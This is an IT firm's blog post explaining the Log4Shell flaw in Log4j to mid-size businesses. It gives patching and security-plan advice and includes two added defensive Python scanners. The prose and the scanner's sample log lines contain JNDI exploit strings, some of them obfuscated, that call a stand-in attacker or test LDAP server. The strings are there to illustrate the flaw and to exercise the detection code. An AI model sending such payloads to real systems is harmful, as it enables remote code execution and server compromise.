Just in Time For The Holidays – LOG4J

What Mid-Size Businesses Need to Know About the Internet’s Latest Cyber Security Threat

If you’re an owner or manager of a mid-sized business, you’ve no doubt heard about the latest threat to your cyber assets – LOG4J. The holidays are an exceptionally vulnerable time for cyber threats as users are focused on closing out their business year, taking end-of-year vacations, and finishing that last bit of shopping. The heightened stress and reduced time lead to careless mistakes. Cyber criminals will no doubt attempt to profit from the LOG4J vulnerability to close out their year-end on a high note.

We at Stryker Networks are committed to helping you protect your business and your digital assets. While not a definitive guide, we will attempt to give you high-level answers to three common questions: What is LOG4J? How does it affect me? What do I need to do?

What is LOG4J? – and What It Isn’t

LOG4J (Log4j 2, an open-source project of the Apache Software Foundation) is a software library. Think of a library as a piece of a program that many other programs reuse. You don’t install or buy “Times New Roman” on its own, but Word, Excel, and countless other programs include the font “library” as part of their installation. Log4j is a logging library: it writes the running record of what a Java application is doing, and that record often includes text that came from the outside, such as a username someone typed or a header in a web request. It is embedded in an enormous number of Java applications and commercial products, from public-facing web applications to management consoles and network appliances. Most mid-sized businesses do not write Java software themselves, but they routinely use websites, cloud services, and installed products that are built on it.

The LOG4J problem (tracked as CVE-2021-44228 and nicknamed “Log4Shell”) is NOT a virus; it is a vulnerability, a flaw in the library that an attacker exploits. Think of a virus as someone running through your office burning all your files, while an exploit is the little trick of wiggling the locked door handle just the right way to get into the office. Here the trick is a specially formatted piece of text: if an attacker can get a string such as ${jndi:ldap://attacker-controlled-server/...} into anything the application logs (a login form, a web request header, a chat message), a vulnerable version of the library reaches out to that server and runs the code it hands back. Unauthorized access is concerning on its own, but the damage comes from what is done with it. Once a bad actor controls a server this way, they can steal the data on it, deploy malware or ransomware, or use the server to host and distribute malware and viruses to others.
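To make the “door handle” concrete, here is an added example (written for this edit, not code from the original post or from the Log4j project) that scans web-server log lines for the lookup string that triggers the flaw. Attackers rarely send the plain form; they nest lookups such as ${lower:j} or ${::-j} that Log4j resolves before the JNDI lookup runs, and they URL-encode the whole thing, so the scanner undoes both before matching. The log lines and IP addresses are constructed test data (RFC 5737 ranges), and the function names normalize and find_probes are ours.

```python
"""Spot Log4Shell probe strings in web-server log lines, including the common
obfuscations attackers use to dodge naive '${jndi:' matching.
Added example; the log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Innermost ${...} expression: contains no further braces or dollar signs.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(match):
    """Evaluate one innermost lookup the way Log4j's substitutor would for the
    obfuscation tricks seen in the wild; anything else is left untouched."""
    expr = match.group(1)
    if ":-" in expr:                      # ${anything:-default}  ->  default
        return expr.split(":-", 1)[1]
    func, sep, arg = expr.partition(":")
    if sep:
        func = func.strip().lower()
        if func == "lower":               # ${lower:J} -> j
            return arg.lower()
        if func == "upper":               # ${upper:j} -> J
            return arg.upper()
    return match.group(0)                 # e.g. ${jndi:...} stays, so we can match it


def normalize(line, max_rounds=10):
    """Undo URL encoding, then collapse nested lookups from the inside out."""
    s = line
    for _ in range(3):                    # attackers sometimes double-encode
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve_one, s)
        if collapsed == s:
            break
        s = collapsed
    return s


def is_log4shell_probe(line):
    # Lookup prefixes are case-insensitive in Log4j, so ${JnDi:...} also fires.
    return "${jndi:" in normalize(line).lower()


def find_probes(lines):
    """Return (line number, normalized line) for each line carrying a JNDI lookup."""
    return [(n, normalize(text)) for n, text in enumerate(lines, 1) if is_log4shell_probe(text)]


# Constructed sample log lines in Apache combined format (RFC 5737 test addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:02:01 +0000] "GET /login HTTP/1.1" 200 734 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}"',
    '203.0.113.11 - - [10/Dec/2021:10:02:40 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fb%7D HTTP/1.1" 404 210 "-" "curl/7.79"',
    '203.0.113.13 - - [10/Dec/2021:10:03:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap://198.51.100.23/x}"',
]

if __name__ == "__main__":
    for n, text in find_probes(SAMPLE_LOG):
        print(f"line {n}: {text}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file’s lines. A hit does not prove the server was vulnerable, only that someone tried; the address after ldap:// or rmi:// is where the victim would have connected, so it is the address to look for in firewall and DNS logs.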

How Does It Affect Me?

The LOG4J vulnerability affects mid-sized businesses differently than enterprise companies. Large enterprises such as Amazon, Microsoft, and Apple almost certainly run (or ran) applications that were susceptible to an attack. They are busy patching their servers to prevent intrusion – just like changing the lock on the door for one that can’t be jiggled open – and, because the flaw was being exploited within hours of its disclosure, checking their logs for signs that someone got in before the patch landed.

Mid-sized businesses face a different problem. You probably don’t know which of the websites, cloud services, and installed products you rely on contain the vulnerable library, let alone their patch status. Two risks follow. First, a site or service you have come to trust can be compromised and turned against you, whether by serving you malware or by exposing the data you keep there. Second, any Java-based software or appliance on your own network (management consoles, monitoring tools, and network or storage products commonly embed the library) may be vulnerable itself, and an attacker who can reach it gains a foothold inside your network. Either way, you are affected because there is yet another method for the bad guys to compromise you.

What Can You Do About It?

The best defense against this and other cyber threats is to have a comprehensive cyber security plan. Threat actors will use the vulnerability to get onto your vendors’ servers, and onto any vulnerable server of your own, and then use that access to deliver or run malicious code on your network. You should already have a multi-tiered plan in place to detect, isolate, and remediate these attempts. A typical plan would include:

    • Inventory and Patching: Ask every vendor whose product or service you depend on whether it uses Log4j and when it was fixed, and keep their written answers. Apply vendor updates to software and appliances on your own network as soon as they ship. For anything you run yourself, upgrade Log4j 2 to a fixed release: the original flaw (CVE-2021-44228) affects versions 2.0-beta9 through 2.14.1 and is closed in 2.15.0 (2.12.2 and 2.3.1 for the older Java 7 and Java 6 lines); follow-up releases fixed related problems found afterwards, so take the newest 2.x release your vendor supports. Where no patch exists yet, the project’s own stop-gap is to remove the JndiLookup class from the log4j-core jar.
    • Training: End-user training to keep users alert to unusual activity, unexpected email links, and unfamiliar login prompts.
    • Firewall: A properly configured firewall to limit what can come into your network and, just as importantly, what can leave it. A server exploited through this flaw has to make an outbound connection (typically LDAP or HTTP to an unfamiliar address) to fetch the attacker’s code, so blocking unneeded outbound traffic from servers and alerting on attempts stops many attacks outright.
    • Anti-Virus: A commercial-grade anti-virus application, with updated definitions, to identify and isolate known malicious software.
    • Anti-Malware / Endpoint Detection: While not the same as anti-virus software, anti-malware and endpoint detection and response (EDR) tools flag code and behavior that looks suspicious rather than only matching known signatures. Application allow-listing (sometimes marketed as “zero trust” for endpoints) goes a step further by only letting approved software run on your systems.
    • Rights Management: Users rarely need access to all programs, and programs rarely need administrative rights to the network. The service account a web or Java application runs under should not be an administrator, so that a compromised application gets only that account’s rights. By configuring access to permit only the privileges actually needed, any potential damage is minimized.
    • Data Backups: We recommend on-site and off-site backups of data at both the server and file level, with at least one copy kept offline or immutable so that ransomware which reaches the network cannot encrypt it. Make sure that your backups are being executed and checked at least daily, and test a restore periodically.
    • Logging and Monitoring: Keep web-server, application, and firewall logs long enough to look back several weeks, and review them for exploit attempts and for unexpected outbound connections from servers. Attackers were probing for this flaw before most businesses had heard of it.
    • Cyber Insurance: Most business and E&O policies exclude risks associated with a cyber attack, such as ransoms and data recovery. Check with your insurance agent to ensure that you are properly protected in the unfortunate event that you experience an attack.
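Knowing where the library lives on your own systems is the first step of any plan. The following added example (ours, written for this edit; not a Stryker Networks tool and not code from the Log4j project) walks a directory tree, opens every .jar, .war, .ear, and .zip it finds, looks inside nested archives, reads the version that Log4j ships in its Maven metadata (META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties), and checks whether the JndiLookup class is still present. It judges only the original JNDI flaw (CVE-2021-44228) against the branch-specific fix versions 2.15.0, 2.12.2, and 2.3.1; later releases fixed related issues, so treat anything below the newest 2.x release as due for an update regardless of what it prints. The archives that build_sample_tree creates are constructed placeholders with fake class bytes, there only so the scanner can be tried offline.

```python
"""Find Log4j 2 core jars on disk (including jars nested in .war/.ear files)
and flag those still exposed to CVE-2021-44228. Added example, not a vendor
tool; the sample archives it builds are constructed placeholders."""
import io
import os
import sys
import tempfile
import zipfile

# The class that performs the JNDI lookup; the emergency mitigation was to delete it.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata Log4j ships inside log4j-core; carries the exact release version.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# First release on each branch that closes CVE-2021-44228 (later CVEs moved these further).
FIXED_BY_BRANCH = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}
FIXED_DEFAULT = (2, 15, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Non-numeric suffixes are dropped."""
    parts = []
    for piece in text.replace("-", ".").split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def is_vulnerable(version, has_jndi_class):
    """Exposed if the lookup class is present and the version predates the branch fix."""
    if not has_jndi_class:
        return False
    return version < FIXED_BY_BRANCH.get(version[:2], FIXED_DEFAULT)


def inspect_archive(zf, label):
    names = set(zf.namelist())
    has_jndi = JNDI_CLASS in names
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if has_jndi or version is not None:
        # Unknown version (shaded or renamed jar) with the class present counts as vulnerable.
        yield {"archive": label, "version": version, "jndi_lookup": has_jndi,
               "vulnerable": is_vulnerable(parse_version(version or "0"), has_jndi)}
    for name in names:  # recurse into fat jars and WEB-INF/lib inside .war files
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except (zipfile.BadZipFile, KeyError):
                continue
            yield from inspect_archive(inner, f"{label}!{name}")


def scan_path(root):
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        yield from inspect_archive(zf, path)
                except (zipfile.BadZipFile, OSError):
                    continue


def _write_jar(path, version=None, include_jndi=True, nested=None):
    """Constructed placeholder jar: real metadata paths, fake class bytes."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        for inner_name, inner_path in (nested or {}).items():
            zf.write(inner_path, inner_name)


def build_sample_tree():
    """Constructed directory tree for trying the scanner offline."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "lib")
    _write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    _write_jar(os.path.join(lib, "log4j-api-2.14.1.jar"), include_jndi=False)
    _write_jar(os.path.join(root, "patched", "log4j-core-2.17.1.jar"), "2.17.1")
    _write_jar(os.path.join(root, "mitigated", "log4j-core-2.14.1-jndiremoved.jar"), "2.14.1", include_jndi=False)
    inner = os.path.join(root, "log4j-core-2.12.1.jar")
    _write_jar(inner, "2.12.1")
    _write_jar(os.path.join(root, "webapp.war"), include_jndi=False,
               nested={"WEB-INF/lib/log4j-core-2.12.1.jar": inner})
    os.remove(inner)  # keep only the copy nested inside the .war
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for r in scan_path(target):
        print("VULNERABLE" if r["vulnerable"] else "ok        ", r["version"], r["archive"])
```

Run it as python scan_log4j.py /path/to/scan on each server (without an argument it scans the constructed sample tree). Archives it cannot open are skipped silently, and it does not look inside running processes or inside compressed formats other than zip, so a clean result is a starting point for the vendor questions above, not proof that nothing is affected.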

Don’t have a plan or not sure if your plan is sufficient? Contact Stryker Networks at 847-908-3210 or inquiries@strykernetworks.com and we’ll be happy to discuss your concerns and needs.